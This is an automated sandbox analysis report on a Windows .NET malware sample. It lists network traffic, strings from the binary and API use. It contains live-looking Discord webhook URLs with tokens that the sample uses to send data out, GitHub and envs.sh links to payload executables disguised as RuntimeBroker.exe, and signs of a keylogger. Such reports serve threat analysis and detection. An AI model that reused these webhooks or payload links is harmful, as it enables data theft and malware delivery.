Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Host: discord.comCookie: __dcfduid=2d70ebc6efb511ef9e806e9e405494fd; __sdcfduid=2d70ebc6efb511ef9e806e9e405494fd68edbb25a1a1a5f54a2f7708fe19f144d2d47404569e00bb41afeba6c46e91f4; __cfruid=d657615d9f226b4ff49984308b01de772a9f9def-1740074690; _cfuvid=1MfMcAo7ccgHLSSA0AMvCBbfBrg9qWd8NYTR3y8Kw1k-1740074690245-0.0.1.1-604800000
Source: global traffic DNS traffic detected: DNS query: pastebin.com
Source: global traffic DNS traffic detected: DNS query: github.com
Source: global traffic DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic DNS traffic detected: DNS query: discord.com
Source: unknown HTTP traffic detected: POST /api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx HTTP/1.1Content-Type: application/json; charset=utf-8Host: discord.comContent-Length: 110Expect: 100-continueConnection: Keep-Alive
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000003231000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000002F11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://discord.com
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000003231000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000002F11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://discord.comd
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://github.com
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://github.comd
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000002F93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pastebin.com
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000002F93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pastebin.comd
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.000000000305A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://raw.githubusercontent.com
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.000000000305A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://raw.githubusercontent.comd
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000002F11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000002F11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discord.com
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe String found in binary or memory: https://discord.com/api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe String found in binary or memory: https://discord.com/api/webhooks/1339146559857754123/RdvE5BFpIVjJP7fStDbzM9nS9pXbrPaXzwJ6OjTc39Ubv9m
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe String found in binary or memory: https://discord.com/api/webhooks/1340319227051249694/Ca6cXCrILucyEp_JrqzaHC37GI4_2qn465cM3N-JDhO-XyQ
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.00000000031FD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000003231000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.00000000030A8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.00000000031D6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000003211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.00000000030F8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000003252000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discord.comD
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe String found in binary or memory: https://envs.sh/dG.exe/dG.exe
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000002F93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe String found in binary or memory: https://github.com/kfocc557/kfocc/raw/refs/heads/main/RuntimeBroker.exe
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe String found in binary or memory: https://github.com/kfocc557/kfocc/raw/refs/heads/main/RuntimeBroker.exeI
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000002F11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/kfocc557/kfocc/raw/refs/heads/main/RuntimeBroker.exet
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe String found in binary or memory: https://github.com/kfocc557/kfocc/raw/refs/heads/main/vmss.exe3vmss.exe
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe String found in binary or memory: https://i.imgur.com/4M34hi2.png
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.00000000031E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&se
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.000000000304A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.000000000326E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.00000000031FD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000003284000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000003042000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.00000000031F3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.000000000323A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.00000000030A8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.00000000030EA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.000000000303A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.000000000328C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.000000000321C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.000000000310D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000003032000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.000000000304E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000003046000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.000000000305A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000003052000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000003252000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://o64374.ingest.sentry.io;
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000002F11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe String found in binary or memory: https://pastebin.com/4LkF0iPK
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000002FD6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000002FBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/i/facebook.png
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe String found in binary or memory: https://pastebin.com/raw/
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000002FD6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000002FBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/search
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.000000000305A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000003015000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.000000000305A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/kfocc557/kfocc/refs/heads/main/RuntimeBroker.exe
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000002FD6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000002FBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/pastebin
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000002FD6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000002FBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-S72LBY47R8
Source: unknown Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.6:49713 version: TLS 1.2
Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Code function: 0_2_0B14B9C0 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState, 0_2_0B14B9C0
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Code function: 0_2_01148E00 0_2_01148E00
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Code function: 0_2_01141348 0_2_01141348
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Code function: 0_2_092BBDC8 0_2_092BBDC8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Code function: 0_2_092BBDB8 0_2_092BBDB8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Code function: 0_2_092BDC21 0_2_092BDC21
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Code function: 0_2_0B14EBE8 0_2_0B14EBE8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Code function: 0_2_0B14BD68 0_2_0B14BD68
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000000.2123516276.0000000000AB2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: _originalFileNames vs SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3991881938.000000000116E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000000.2123554402.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameRuntimeBroker.exe< vs SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.0000000003056000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRuntimeBroker.exe< vs SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3993366214.0000000003F11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: _originalFileNames vs SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3993366214.0000000003F11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRuntimeBroker.exe< vs SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3992217260.000000000305A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRuntimeBroker.exe< vs SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Binary or memory string: _originalFileNames vs SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Binary or memory string: OriginalFilenameRuntimeBroker.exe< vs SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, CleanerCore.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe.3f19550.0.raw.unpack, CleanerCore.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe.3f42570.1.raw.unpack, CleanerCore.cs Cryptographic APIs: 'CreateDecryptor'
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, CleanerCore.cs Security API names: Microsoft.Win32.RegistryKey.SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, CleanerCore.cs Security API names: System.Security.AccessControl.RegistrySecurity.AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 0.2.SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe.3f19550.0.raw.unpack, SecurityManager.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe.3f19550.0.raw.unpack, SecurityManager.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe.3f42570.1.raw.unpack, SecurityManager.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe.3f42570.1.raw.unpack, SecurityManager.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe.3f19550.0.raw.unpack, CleanerCore.cs Security API names: Microsoft.Win32.RegistryKey.SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 0.2.SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe.3f19550.0.raw.unpack, CleanerCore.cs Security API names: System.Security.AccessControl.RegistrySecurity.AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, SecurityManager.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, SecurityManager.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe.3f42570.1.raw.unpack, CleanerCore.cs Security API names: Microsoft.Win32.RegistryKey.SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 0.2.SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe.3f42570.1.raw.unpack, CleanerCore.cs Security API names: System.Security.AccessControl.RegistrySecurity.AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: classification engine Classification label: mal56.troj.winEXE@1/0@4/4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Mutant created: NULL
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Virustotal: Detection: 38%
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: rasadhlp.dll Jump to behavior
